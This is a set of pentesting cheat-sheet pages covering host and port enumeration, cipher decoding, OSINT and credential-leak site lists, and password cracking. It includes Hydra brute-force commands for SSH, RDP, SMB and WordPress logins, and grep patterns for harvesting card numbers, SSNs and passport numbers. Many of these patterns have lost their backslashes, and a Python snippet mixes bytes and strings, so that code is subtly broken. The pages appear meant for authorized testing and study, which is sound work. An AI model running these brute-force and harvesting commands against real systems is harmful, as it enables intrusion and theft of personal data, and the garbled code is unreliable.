/os-agnostic/basic-enumeration.md: -------------------------------------------------------------------------------- 1 | # Basic Enumeration 2 | 3 | {% hint style="success" %} 4 | Hack Responsibly. 5 | 6 | Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here. 7 | {% endhint %} 8 | 9 | ## Host Enumeration 10 | 11 | ### Live host enumeration with cmd.exe 12 | 13 | ```bash 14 | for /L %i in (1,1,255) do @ping -n 1 10.10.10.%i | find "TTL=" 15 | ``` 16 | 17 | ### Hostname enumeration with `host` (Linux) 18 | 19 | Uses DNS reverse lookups to find hostnames for IP in a range. In this example it will scan the subnet 10.10.10.0/24. 20 | 21 | ```bash 22 | for ip in $(seq 1 254); do host 10.10.10.$ip; done | grep -v "not found" 23 | ``` 24 | 25 | ## Port Scanning 26 | 27 | ### Nmap 28 | 29 | A basic bash script for doing enumeration based on a list of IPs gathered from a ping sweep of a network. 30 | 31 | ```bash 32 | #!/bin/bash 33 | nmap -sn -oN ip_list 192.168.1.0/24 34 | cat ip_list | while read ip 35 | do 36 | nmap -sCV -p- -vvv -oA $ip.map $ip 37 | done 38 | ``` 39 | 40 | The options I regularly use are: 41 | 42 | | `Flag` | Purpose | 43 | | ----------- | --------------------------------------------------------------------------------------------------------------------------- | 44 | | `-p-` | A shortcut which tells nmap to scan all ports | 45 | | `-vvv` | Gives very verbose output so I can see the results as they are found, and also includes some information not normally shown | 46 | | `-sC` | Equivalent to `--script=default` and runs a collection of nmap enumeration scripts against the target | 47 | | `-sV` | Does a service version scan | 48 | | `-oA $name` | Saves all three formats (standard, greppable, and XML) of output with a filename of `$name` | 49 | 50 | ### NmapAutomator 51 | 52 | NmapAutomator by @21y4d ([https://github.com/21y4d/nmapAutomator](https://github.com/21y4d/nmapAutomator)) is a great tool for automating your basic enumeration. I highly recommend learning how to do it manually so you know what is happening behind the scenes. Very noisy tool. Best for CTF-type environments and not real Red Team engagements. 53 | 54 | ### Port scanning with netcat 55 | 56 | Not recommended to scan all ports as it will take a very long time. Better to use this for targeted scans of a few ports, and only when better tools are not available. 57 | 58 | #### TCP: 59 | 60 | ```bash 61 | nc -n -vv -w 1 -z $ip 1-65535 | grep "open" 62 | ``` 63 | 64 | #### UDP: 65 | 66 | ```bash 67 | nc -n -v -u -z -w 1 $ip 1-65535 | grep "open" 68 | ``` 69 | 70 | ### Masscan 71 | 72 | [https://github.com/robertdavidgraham/masscan](https://github.com/robertdavidgraham/masscan) 73 | 74 | Masscan is an incredibly fast network scanner. Using this to find open ports, then sending the results to nmap to do a more thorough enumeration could speed things up. Masscan requires `sudo` privileges to run. 75 | 76 | ``` 77 | sudo masscan -p 0-65535 10.10.10.0/24 --rate=1000 78 | ``` 79 | 80 | ## SMB/Samba 81 | 82 | 83 | 84 | ## NetBIOS 85 | 86 | ``` 87 | sudo nbtscan -r 10.10.10.0/24 88 | ``` 89 | 90 | Does a NBT name scan using source port 137 (`-r`). 91 | -------------------------------------------------------------------------------- /os-agnostic/cryptography-and-encryption.md: -------------------------------------------------------------------------------- 1 | # Cryptography & Encryption 2 | 3 | ## Cryptography 4 | 5 | {% embed url="https://pequalsnp-team.github.io/cheatsheet/crypto-101" %} 6 | 7 | ## Ciphers 8 | 9 | * [https://www.boxentriq.com/code-breaking](https://www.boxentriq.com/code-breaking) <-- useful site which can help identify type of cipher. 10 | * [https://www.dcode.fr](https://www.dcode.fr) <-- one of the best sites I have found with many decoders for many types of ciphers. 11 | * [Cyber Chef](https://gchq.github.io/CyberChef/) <-- very useful for chained ciphers which require different steps to solve. Can decrypt certificates. 12 | 13 | ### Fernet 14 | 15 | Fernet (symmetric encryption) - **looks like base64** but decodes to garbage, in two parts. First part (32 bytes) is the key. Uses 128-bit AES in CBC mode and PKCS7 padding, with HMAC using SHA256 for authentication. IV is created from `os.random()`. 16 | 17 | Decode fernet @ [https://asecuritysite.com/encryption/ferdecode](https://asecuritysite.com/encryption/ferdecode) <-- Will also give the IV and timestamp (could be useful!) more info about this @ [https://cryptography.io/en/latest/fernet](https://cryptography.io/en/latest/fernet) 18 | 19 | ```python 20 | from cryptography.fernet import Fernet 21 | 22 | key = Fernet.generate_key() 23 | f = Fernet(key) 24 | token = f.encrypt(b"this is my key") 25 | print('the key is ' + key + '/nThe cipher text is ' + token) 26 | ==========decrypt 27 | from cryptography.fernet import Fernet 28 | key = 'input key here' 29 | f = Fernet(key) 30 | token = 'cipher text here' 31 | print(f.decrypt(token)) 32 | ``` 33 | 34 | ### Malbolge 35 | 36 | Esoteric inferno encryption. Used in some CTF challenges. Malbolge programming language - **text from base64 looks like random text**, but complete garbage (much of it unprintable.) . Read for at [https://en.wikipedia.org/wiki/Malbolge](https://en.wikipedia.org/wiki/Malbolge) and [https://www.tutorialspoint.com/execute\_malbolge\_online.php](https://www.tutorialspoint.com/execute\_malbolge\_online.php) 37 | 38 | ### BrainFuck 39 | 40 | A programming language that uses a series of only `+-.[]<>` characters. 41 | 42 | \++++++++++\[>+>+++>+++++++>++++++++++<<<<-]>>>----.>++++++++++++++.-----------------.++++++++.+++++.--------.+++++++++++++++.------------------.++++++++. = BrainFuck 43 | 44 | Decode using [https://www.dcode.fr/brainfuck-language](https://www.dcode.fr/brainfuck-language) 45 | 46 | ### OOK! 47 | 48 | Uses only the word `ook` paired with punctuation marks (`.!?`). Shorthand leaves out `ook`. 49 | 50 | ....................!?.?...?.......?...............?....................?.?.?.?.!!?!.?.?.?..................!.!.!!!!!!!!!.?.......!. = OOK! 51 | 52 | Decode using [https://www.dcode.fr/ook-language](https://www.dcode.fr/ook-language) 53 | 54 | ## Test for Plaintext Output from a (Python) Script 55 | 56 | ```python 57 | #checks the output from crypto and sees if at least 60% is ascii letters and returns true for possible plaintext 58 | def is_plaintext(ptext): 59 | num_letters = sum(map(lambda x : 1 if x in string.ascii_letters else 0, ptext)) 60 | if num_letters / len(ptext) >= .6: 61 | return True 62 | ``` 63 | 64 | If this function is giving false positives/negatives, it can be tweaked by altering the number in the line: 65 | 66 | ```python 67 | if num_letters / len(ptext) >= .6: 68 | ``` 69 | 70 | `0.6` has been tested as working for simple CTF usage. 71 | 72 | ## Digital Certificates 73 | 74 | X.509 75 | 76 | [https://8gwifi.org/PemParserFunctions.jsp](https://8gwifi.org/PemParserFunctions.jsp) -- extract information from various digital certificates 77 | 78 | ## SSH Keys 79 | 80 | For those interested in the details - you can see what's inside the public key file (generated as explained above), by doing this:- \`\`\`openssl rsa -noout -text -inform PEM -in key.pub -pubin or for the private key file, this:- openssl rsa -noout -text -in key.private which outputs as text on the console the actual components of the key (modulus, exponents, primes, ...) 81 | 82 | ` `` extract public key from private key: `openssl rsa -in privkey.pem -pubout -out key.pub\` 83 | 84 | ## Encryption/Decryption 85 | 86 | [https://www.devglan.com/online-tools/aes-encryption-decryption](https://www.devglan.com/online-tools/aes-encryption-decryption) 87 | 88 | [CyberChef](https://gchq.github.io/CyberChef/): Website for encryption/decryption of many different types at same time 89 | 90 | good cipher tools: [http://rumkin.com/](http://rumkin.com/) 91 | 92 | one time pad: `pt - ct = key` 93 | 94 | decrypt rsa private key: `openssl rsautl -decrypt -inkey $key_file < $pass.crypt` ($pass.crypt is hex file? encrypted contents of pub key?) 95 | 96 | * [Ippsec:HacktheBox - Charon](https://www.youtube.com/watch?v=\_csbKuOlmdE) 97 | 98 | ### Decrypt LDAP Passwords 99 | 100 | [https://dotnetfiddle.net/2RDoWz](https://dotnetfiddle.net/2RDoWz) 101 | 102 | ```csharp 103 | using System; 104 | using System.IO; 105 | using System.Security.Cryptography; 106 | using System.Text; 107 | 108 | public class Program 109 | { 110 | public static void Main() 111 | { 112 | //Change these three variables to decode your own; need a key and IV to decode! 113 | string ciphertext = "BQO5l5Kj9MdErXx6Q6AGOw=="; 114 | string key = "c4scadek3y654321"; 115 | string iv = "1tdyjCbY1Ix49842"; 116 | 117 | string plaintext = string.Empty; 118 | plaintext = DecryptString(ciphertext, key, iv); 119 | Console.WriteLine(plaintext); 120 | } 121 | 122 | public static string DecryptString(string EncryptedString, string Key, string iv) 123 | { 124 | byte[] buffer = Convert.FromBase64String(EncryptedString); 125 | Aes aes = Aes.Create(); 126 | ((SymmetricAlgorithm) aes).KeySize = 128; 127 | ((SymmetricAlgorithm) aes).BlockSize = 128; 128 | ((SymmetricAlgorithm) aes).IV = Encoding.UTF8.GetBytes(iv); 129 | ((SymmetricAlgorithm) aes).Mode = CipherMode.CBC; 130 | ((SymmetricAlgorithm) aes).Key = Encoding.UTF8.GetBytes(Key); 131 | using (MemoryStream memoryStream = new MemoryStream(buffer)) 132 | { 133 | using (CryptoStream cryptoStream = new CryptoStream((Stream) memoryStream, ((SymmetricAlgorithm) aes).CreateDecryptor(), CryptoStreamMode.Read)) 134 | { 135 | byte[] numArray = new byte[checked (buffer.Length - 1 + 1)]; //not sure why this has -1+1 here, example works without it though... 136 | cryptoStream.Read(numArray, 0, numArray.Length); 137 | return Encoding.UTF8.GetString(numArray); 138 | } 139 | } 140 | } 141 | } 142 | ``` 143 | 144 | Decodes to: `w3lc0meFr31nd` 145 | 146 | 147 | 148 | If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)! 149 | -------------------------------------------------------------------------------- /os-agnostic/network-hardware.md: -------------------------------------------------------------------------------- 1 | # Network Hardware 2 | 3 | {% hint style="success" %} 4 | Hack Responsibly. 5 | 6 | Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here. 7 | {% endhint %} 8 | 9 | {% hint style="danger" %} 10 | Not much here yet...please feel free to contribute at [my GitHub page](https://github.com/zweilosec/Infosec-Notes). 11 | {% endhint %} 12 | 13 | [https://www.bettercap.org/](https://www.bettercap.org/) 14 | 15 | [https://miloserdov.org/?p=1112#1](https://miloserdov.org/?p=1112#1) 16 | 17 | ## Default credentials/configurations 18 | 19 | [https://www.routerdefaults.org/](https://www.routerdefaults.org/) 20 | 21 | {% embed url="https://www.routerpasswords.com/" %} 22 | 23 | 24 | 25 | If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)! 26 | -------------------------------------------------------------------------------- /os-agnostic/os_agnostic.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: >- 3 | TODO: Rename this to something more interesting or appropriate, pull out stuff 4 | to its own section. 5 | --- 6 | 7 | # OS Agnostic 8 | 9 | {% hint style="success" %} 10 | Hack Responsibly. 11 | 12 | Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here. 13 | {% endhint %} 14 | 15 | {% hint style="danger" %} 16 | Not much here yet...please feel free to contribute at [my GitHub page](https://github.com/zweilosec/Infosec-Notes). 17 | {% endhint %} 18 | -------------------------------------------------------------------------------- /os-agnostic/osint.md: -------------------------------------------------------------------------------- 1 | # OSINT 2 | 3 | ## OSINT Multitool 4 | 5 | {% embed url="https://osintframework.com/" %} 6 | Mind map of many many OSINT tools and websites 7 | {% endembed %} 8 | 9 | ## Google Account Enumeration 10 | 11 | {% embed url="https://medium.com/week-in-osint/getting-a-grasp-on-googleids-77a8ab707e43" %} 12 | 13 | This writeup from Sector035 gives a detailed walk through of how to get a wealth of information from a Google account such as a @gmail.com email address. 14 | 15 | {% hint style="danger" %} 16 | Some of the steps for doing this require you to actually sign in to a Google account, and to add the target as a contact. A burner account or sock puppet are recommended if you are doing this for a real engagement. 17 | {% endhint %} 18 | 19 | [https://developers.google.com/identity/sign-in/web/people](https://developers.google.com/identity/sign-in/web/people) [https://developers.google.com/people/api/rest/v1/people/get](https://developers.google.com/people/api/rest/v1/people/get) 20 | 21 | ## Multipurpose 22 | 23 | * https://shodan.io/ 24 | * https://www.zoomeye.org/ 25 | * https://leakix.net/ 26 | * https://www.yougetsignal.com/ 27 | * https://intelx.io/ 28 | * https://pentest-tools.com/ 29 | * [https://osintframework.com/](https://osintframework.com/) 30 | 31 | [RiskIQ’s Community Edition](https://www.riskiq.com/products/community-edition/) - 32 | 33 | > Threat Hunter 34 | > 35 | > * Access the most comprehensive internet data sets available to track adversaries across the internet 36 | > * Pivot across passive DNS, WHOIS, SSL certificates, web trackers, and more 37 | > * Enrich internal controls and logs to uncover, understand, and respond to external threats 38 | > * Monitor threat infrastructure for changes or new, similar artifacts 39 | > 40 | > Threat Defender 41 | > 42 | > * Understand your Digital Footprint® and how you’re exposed from the outside in 43 | > * Discover unknown assets, exposures, and vulnerabilities 44 | > * Get alerts when your brand or trademarked terms appear in new domains and WHOIS contact information 45 | > * View digital assets details such as domain attributes, IP address, and registrant details 46 | 47 | [https://censys.io/](https://censys.io/) - Attack surface enumeration 48 | 49 | > Discover every asset in your attack surface, known or unknown. 50 | 51 | ## Domain/IP Recon 52 | 53 | * https://domainbigdata.com/ 54 | * https://viewdns.info/ 55 | * http://bgp.he.net/ 56 | * https://rapiddns.io/ 57 | * https://dnsdumpster.com/ 58 | * https://www.whoxy.com/ 59 | * [http://whois.domaintools.com/](http://whois.domaintools.com/) 60 | 61 | [https://www.robtex.com/](https://www.robtex.com/) - Good for geo-location of IP origin 62 | 63 | > Robtex is used for various kinds of research of IP numbers, Domain names, etc 64 | > 65 | > Robtex uses various sources to gather public information about IP numbers, domain names, host names, Autonomous systems, routes etc. It then indexes the data in a big database and provide free access to the data. 66 | 67 | [https://opendata.rapid7.com/sonar.fdns\_v2/](https://opendata.rapid7.com/sonar.fdns\_v2/) 68 | 69 | > Project Sonar produces a [Forward DNS](https://scans.io/study/sonar.fdns\_v2) dataset every week or so. This data is created by extracting domain names from a number of sources and then sending an `ANY` query for each domain. The sources used to build the list of domains include: 70 | > 71 | > * Reverse DNS (PTR) Records 72 | > * Common Name and SubjectAltName fields from SSL Certificates 73 | > * HTML elements and Location headers seen in HTTP responses 74 | > * Zone files from COM, INFO, ORG, NET, BIZ, INFO and other TLDs 75 | > * Zone files from gTLDs 76 | > 77 | > The data format is a gzip-compressed JSON file, where each line of the file is a JSON document with attributes for the record name, type, value and time of resolution. 78 | 79 | ## Mail server blacklist enumerator 80 | 81 | * http://multirbl.valli.org/ 82 | 83 | ## Dark web exposure 84 | 85 | * https://immuniweb.com/radar/ 86 | 87 | ## New acquisitions 88 | 89 | * https://crunchbase.com/ 90 | 91 | ## Email 92 | 93 | * https://hunter.io/ 94 | * Email Domain enumeration 95 | * [https://emkei.cz/](https://emkei.cz/) 96 | * Fake email sender 97 | 98 | ## Social Media 99 | 100 | ### Social media search engine 101 | 102 | * [https://kribrum.io/](https://kribrum.io/) 103 | * This page is in Russian! 104 | 105 | ### Accounts registered by email 106 | 107 | * [emailrep.io ](https://emailrep.io/) 108 | 109 | ### Enumerate usernames 110 | 111 | * [https://whatsmyname.app/](https://whatsmyname.app/) 112 | 113 | ### Twitter 114 | 115 | * [https://tinfoleak.com/](https://tinfoleak.com/) 116 | 117 | ### Instagram 118 | 119 | * [https://www.searchmy.bio/](https://www.searchmy.bio/) 120 | 121 | ### Facebook 122 | 123 | ### Skype 124 | 125 | * [https://mostwantedhf.info/](https://mostwantedhf.info/) 126 | 127 | ### Forums 128 | 129 | * [https://boardreader.com/](https://boardreader.com/) 130 | 131 | ### Pastebin 132 | 133 | * [https://psbdmp.ws/](https://psbdmp.ws/) 134 | 135 | ## Advanced Search 136 | 137 | ### Search with results grouped by topic 138 | 139 | * [https://search.carrot2.org/](https://search.carrot2.org/) 140 | 141 | ### Search by Region/ Augmented keyword search 142 | 143 | * [https://swisscows.com/](https://swisscows.com/) 144 | 145 | ### Source code search engines 146 | 147 | * [https://publicwww.com/](https://publicwww.com/) 148 | * Can search by language or feature 149 | * [https://searchcode.com/](https://searchcode.com/) 150 | * Search public repositories 151 | * [https://www.shhgit.com/](https://www.shhgit.com/) 152 | * Searches for "secrets" inside git code repos 153 | * FOSS version at [https://github.com/eth0izzle/shhgit](https://github.com/eth0izzle/shhgit) 154 | 155 | ## Credential Leak Sites 156 | 157 | {% embed url="https://haveibeenpwned.com" %} 158 | 159 | Run by Troy Hunt, haveibeenpwned.com is one of the best for checking whether an email address has been involved in a credential breach. 160 | 161 | {% hint style="danger" %} 162 | Not all of these sites below are trustworthy. Do not enter any credentials that are in use, or you plan to use into any searches! 163 | {% endhint %} 164 | 165 | * https://link-base.org/index.php 166 | * http://xjypo5vzgmo7jca6b322dnqbsdnp3amd24ybx26x5nxbusccjkm4pwid.onion/ 167 | * http://pwndb2am4tzkvold.onion 168 | * https://weleakinfo.to/ 169 | * https://www.dehashed.com/search?query= 170 | * https://rslookup.com 171 | * https://leakcheck.net 172 | * https://snusbase.com 173 | * https://leakpeek.com 174 | * https://breachchecker.com 175 | * https://leak-lookup.com 176 | * https://weleakinfo.to 177 | * https://leakcheck.io 178 | * http://scylla.sh 179 | * http://scatteredsecrets.com 180 | * https://joe.black/leakengine.html 181 | * https://services.normshield.com/data-breach 182 | * https://leakedsource.ru/main/ 183 | * https://leaked.site/ 184 | * https://ghostproject.fr/ 185 | * https://haveibeensold.app/ 186 | * https://vigilante.pw/ 187 | * https://nuclearleaks.com/ 188 | * https://hashes.org/ 189 | * https://leak.sx/ 190 | * https://leakcorp.com/login 191 | * https://private-base.info/ 192 | * https://4iq.com/ 193 | * https://intelx.io 194 | * https://leakprobe.net 195 | 196 | 197 | 198 | If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)! 199 | -------------------------------------------------------------------------------- /os-agnostic/password-cracking/README.md: -------------------------------------------------------------------------------- 1 | # Password Cracking 2 | 3 | {% hint style="success" %} 4 | Hack Responsibly. 5 | 6 | Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here. 7 | {% endhint %} 8 | 9 | ## Headings: 10 | 11 | This page was getting to be long, so here are shortcuts to the major sections. I broke these out into separate pages for better organization and searchability. 12 | 13 | * [Getting the hashes](gathering-the-hashes.md) 14 | * [Wordlist manipulation](wordlist-manipulation.md) 15 | * [Cracking the Hashes](cracking-the-hashes.md) 16 | 17 | Not all methods of discovering passwords involve directly "cracking" hashes. Brute forcing logins and direct recovery programs are also viable solutions. 18 | 19 | ## Default Credentials 20 | 21 | Search using your favorite web search engine for default credentials of the technology that is being used, or try the following compilation lists: 22 | 23 | * [**https://github.com/ihebski/DefaultCreds-cheat-sheet**](https://github.com/ihebski/DefaultCreds-cheat-sheet) 24 | * [**http://www.phenoelit.org/dpl/dpl.html**](http://www.phenoelit.org/dpl/dpl.html) 25 | * [**http://www.vulnerabilityassessment.co.uk/passwordsC.htm**](http://www.vulnerabilityassessment.co.uk/passwordsC.htm) 26 | * [**https://192-168-1-1ip.mobi/default-router-passwords-list/**](https://192-168-1-1ip.mobi/default-router-passwords-list/) 27 | * [**https://datarecovery.com/rd/default-passwords/**](https://datarecovery.com/rd/default-passwords/) 28 | * [**https://bizuns.com/default-passwords-list**](https://bizuns.com/default-passwords-list) 29 | * [**https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/default-passwords.csv**](https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/default-passwords.csv) 30 | * [**https://github.com/Dormidera/WordList-Compendium**](https://github.com/Dormidera/WordList-Compendium) 31 | * [**https://www.cirt.net/passwords**](https://www.cirt.net/passwords) 32 | * [**http://www.passwordsdatabase.com/**](http://www.passwordsdatabase.com) 33 | * [**https://many-passwords.github.io/**](https://many-passwords.github.io) 34 | 35 | ## Wordlists 36 | 37 | * [**https://github.com/danielmiessler/SecLists**](https://github.com/danielmiessler/SecLists) 38 | * [**https://github.com/Dormidera/WordList-Compendium**](https://github.com/Dormidera/WordList-Compendium) 39 | * [**https://github.com/kaonashi-passwords/Kaonashi**](https://github.com/kaonashi-passwords/Kaonashi) 40 | * [**https://github.com/google/fuzzing/tree/master/dictionaries**](https://github.com/carlospolop/hacktricks/tree/95b16dc7eb952272459fc877e4c9d0777d746a16/google/fuzzing/tree/master/dictionaries/README.md) 41 | * [**https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm**](https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm) 42 | 43 | ## Password Recovery 44 | 45 | Password recovery programs: [https://www.passcape.com/products](https://www.passcape.com/products) (TODO:Test these!) 46 | 47 | ### ZIP Password Retrieval (with Known Plaintext) 48 | 49 | _Download pkcrack_ 50 | 51 | [https://www.unix-ag.uni-kl.de/\~conrad/krypto/pkcrack/download1.html](https://www.unix-ag.uni-kl.de/\~conrad/krypto/pkcrack/download1.html) 52 | 53 | ! Before using, it must be built from source 54 | 55 | _Syntax_ 56 | 57 | ```bash 58 | ./pkcrack -C $encrypted.zip -c file -P $plaintext.zip -p file 59 | ``` 60 | 61 | ## Brute forcing logins 62 | 63 | An amazing index of brute-force commands: [https://book.hacktricks.xyz/brute-force](https://book.hacktricks.xyz/brute-force) 64 | 65 | ### Hydra 66 | 67 | Below are a few scriptable examples to brute force logins of common protocols. 68 | 69 | | Command | Description | 70 | | ------------------------------------------------------------------------------------------------------------------------------------ | ---------------------------------------------------------- | 71 | | `hydra -P $pass_list -v $ip snmp -vV` | SNMP: Brute force | 72 | | `hydra -t 1 -l $user -P $pass_list -vV $ip ftp` | FTP: with known user, using password list | 73 | | `hydra -vV -u -L $users_list -P $pass_list -t 1 -u $ip ssh` | SSH: using users list, and passwords list | 74 | | `hydra -vV -u -L $users_list -p $pass -t 1 -u $ip ssh` | SSH: with a known password, and a username list | 75 | | `hydra -vV $ip -s $port ssh -l $user -P $pass_list` | SSH: with known username on non-standard port | 76 | | `hydra -vV -l $user -P $pass_list -f $ip pop3` | POP3: Brute Force | 77 | | `hydra -vV -L $users_list -P $pass_list $ip http-get $login_page` | HTTP GET: with user list and pass list | 78 | | `hydra -vV -t 1 -f -l $user -P $pass_list rdp://$ip` | Windows Remote Desktop: with known username, and pass list | 79 | | `hydra -vV -t 1 -f -l $user -P $pass_list $ip smb` | SMB: brute force with known user, and pass list | 80 | | `hydra -vV -l $user -P $pass_list $ip http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'` | WordPress: brute force an admin login | 81 | | `hydra -vV -L $users_list -p $pass $ip http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'` | WordPress: enumerate users | 82 | | `wpscan --url $url -U $user -P $pass_list` | Use wpscan to brute force password with known user | 83 | 84 | #### Other useful Hydra options 85 | 86 | **`-x min:max:charset` -** Generate passwords from min to max length. Charset can contain `1` for numbers, `a` for lowercase and `A` for uppercase characters. Any other character that is added is put in the list. \ 87 | Example: `1:2:a1%.` The generated passwords will be of length 1 to 2 and contain lowercase letters, numbers and/or percent signs and periods/dots. 88 | 89 | **`-e nsr` -** Do additional checks. `n` for null password, `s` try login as pass, `r` try the reverse login as pass 90 | 91 | ### crackmapexec 92 | 93 | {% embed url="https://github.com/byt3bl33d3r/CrackMapExec" %} 94 | 95 | [https://mpgn.gitbook.io/crackmapexec/](https://mpgn.gitbook.io/crackmapexec/) 96 | 97 | ## Resources 98 | 99 | * [https://www.unix-ninja.com/p/A\_cheat-sheet\_for\_password\_crackers](https://www.unix-ninja.com/p/A\_cheat-sheet\_for\_password\_crackers) 100 | * [https://github.com/frizb/](https://github.com/frizb/) 101 | * [https://guide.offsecnewbie.com/password-cracking](https://guide.offsecnewbie.com/password-cracking) 102 | * [https://www.hackingarticles.in/abusing-kerberos-using-impacket/](https://www.hackingarticles.in/abusing-kerberos-using-impacket/) 103 | 104 | 105 | 106 | If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)! 107 | -------------------------------------------------------------------------------- /os-agnostic/password-cracking/gathering-the-hashes.md: -------------------------------------------------------------------------------- 1 | # Gathering the Hashes 2 | 3 | {% hint style="success" %} 4 | Hack Responsibly. 5 | 6 | Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here. 7 | {% endhint %} 8 | 9 | ## Extracting hashes from text files 10 | 11 | ### Extract md5 hashes 12 | 13 | Using egrep: 14 | 15 | ```bash 16 | egrep -oE '(^|[^a-fA-F0-9])[a-fA-F0-9]{32}([^a-fA-F0-9]|$)' $hash_directory/* | egrep -o '[a-fA-F0-9]{32}' > $out_hash_file 17 | ``` 18 | 19 | Alternatively, with sed: 20 | 21 | ```bash 22 | sed -rn 's/.*[^a-fA-F0-9]([a-fA-F0-9]{32})[^a-fA-F0-9].*/1/p' $hash_directory/* > $out_hash_file 23 | ``` 24 | 25 | {% hint style="info" %} 26 | The two regular expressions above can be used for SHA1, SHA256 and other unsalted hashes represented in hex. The only thing you need to do is change the value**`{32}`**to the corresponding length for your desired hash type. 27 | {% endhint %} 28 | 29 | ### Extract MySQL-Old hashes 30 | 31 | ```bash 32 | grep -e "[0-7][0-9a-f]{7}[0-7][0-9a-f]{7}" $hash_directory/* > $out_hash_file 33 | ``` 34 | 35 | ### Extract blowfish hashes 36 | 37 | ```bash 38 | grep -e "$2a\$\08\$(.){75}" $hash_directory/* > $out_hash_file 39 | ``` 40 | 41 | ### Extract Joomla hashes 42 | 43 | ```bash 44 | egrep -o "([0-9a-zA-Z]{32}):(w{16,32})" $hash_directory/* > $out_hash_file 45 | ``` 46 | 47 | ### Extract Vbulletin hashes 48 | 49 | ```bash 50 | egrep -o "([0-9a-zA-Z]{32}):(S{3,32})" $hash_directory/* > $out_hash_file 51 | ``` 52 | 53 | ### Extract phpBB3-MD5 54 | 55 | ```bash 56 | egrep -o '$H$S{31}' $hash_directory/* > $out_hash_file 57 | ``` 58 | 59 | ### Extract Wordpress-MD5 60 | 61 | ```bash 62 | egrep -o '$P$S{31}' $hash_directory/* > $out_hash_file 63 | ``` 64 | 65 | ### Extract Drupal 7 66 | 67 | ```bash 68 | egrep -o '$S$S{52}' $hash_directory/* > $out_hash_file 69 | ``` 70 | 71 | ### Extract 'old' Unix-MD5 72 | 73 | ```bash 74 | egrep -o '$1$w{8}S{22}' $hash_directory/* > $out_hash_file 75 | ``` 76 | 77 | ### Extract MD5-APR1 78 | 79 | ```bash 80 | egrep -o '$apr1$w{8}S{22}' $hash_directory/* > $out_hash_file 81 | ``` 82 | 83 | ### Extract sha512crypt, SHA512 \(Unix\) 84 | 85 | ```bash 86 | egrep -o '$6$w{8}S{86}' $hash_directory/* > $out_hash_file 87 | ``` 88 | 89 | ## Extracting non-hash strings from text files 90 | 91 | ### Extract e-mails 92 | 93 | ```bash 94 | grep -E -o "\b[a-zA-Z0-9.#?$*_-]+@[a-zA-Z0-9.#?$*_-]+.[a-zA-Z0-9.-]+\b" $text_directory/* > $email_list 95 | ``` 96 | 97 | ### Extract URLs \(HTTP only\) 98 | 99 | ```bash 100 | grep http | grep -shoP 'http.*?[" >]' $text_directory/* > $HTTP_URL_list 101 | ``` 102 | 103 | ### Extract URLs \(HTTP, HTTPS, Gopher, FTP, mailto, etc\) 104 | 105 | ```bash 106 | grep -E '(((http|https|ftp|gopher)|mailto)[.:][^ >" ]*|www.[-a-z0-9.]+)[^ .,; >">):]' $text_directory/* > $HTTP_URL_list 107 | ``` 108 | 109 | {% hint style="info" %} 110 | **Note**: if grep returns "Binary file \(standard input\) matches" use the following approaches: 111 | 112 | **`tr '[\000-\011\013-\037177-377]' '.' < *.log | grep -E $REGEX`** 113 | 114 | or 115 | 116 | **`cat -v *.log | egrep -o $REGEX`** 117 | {% endhint %} 118 | 119 | ### Extract Floating point numbers 120 | 121 | `# grep -E -o "^[-+]?[0-9]*.?[0-9]+([eE][-+]?[0-9]+)?$" *.txt > floats.txt` 122 | 123 | ### Extract credit card data 124 | 125 | Visa `# grep -E -o "4[0-9]{3}[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}" *.txt > visa.txt` 126 | 127 | MasterCard `# grep -E -o "5[0-9]{3}[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}" *.txt > mastercard.txt` 128 | 129 | American Express `# grep -E -o "\b3[47][0-9]{13}\b" *.txt > american-express.txt` 130 | 131 | Diners Club `# grep -E -o "\b3(?:0[0-5]|[68][0-9])[0-9]{11}\b" *.txt > diners.txt` 132 | 133 | Discover `# grep -E -o "6011[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}" *.txt > discover.txt` 134 | 135 | JCB `# grep -E -o "\b(?:2131|1800|35d{3})d{11}\b" *.txt > jcb.txt` 136 | 137 | AMEX `# grep -E -o "3[47][0-9]{2}[ -]?[0-9]{6}[ -]?[0-9]{5}" *.txt > amex.txt` 138 | 139 | ### Extract Social Security Number \(SSN\) 140 | 141 | `# grep -E -o "[0-9]{3}[ -]?[0-9]{2}[ -]?[0-9]{4}" *.txt > ssn.txt` 142 | 143 | ### Extract Indiana Driver License Number 144 | 145 | `# grep -E -o "[0-9]{4}[ -]?[0-9]{2}[ -]?[0-9]{4}" *.txt > indiana-dln.txt` 146 | 147 | ### Extract US Passport Cards 148 | 149 | `# grep -E -o "C0[0-9]{7}" *.txt > us-pass-card.txt` 150 | 151 | ### Extract US Passport Number 152 | 153 | `# grep -E -o "[23][0-9]{8}" *.txt > us-pass-num.txt` 154 | 155 | ### Extract US Phone Numberss 156 | 157 | `# grep -Po 'd{3}[s-_]?d{3}[s-_]?d{4}' *.txt > us-phones.txt` 158 | 159 | ### Extract ISBN Numbers 160 | 161 | `# egrep -a -o "\bISBN(?:-1[03])?:? (?=[0-9X]{10}$|(?=(?:[0-9]+[- ]){3})[- 0-9X]{13}$|97[89][0-9]{10}$|(?=(?:[0-9]+[- ]){4})[- 0-9]{17}$)(?:97[89][- ]?)?[0-9]{1,5}[- 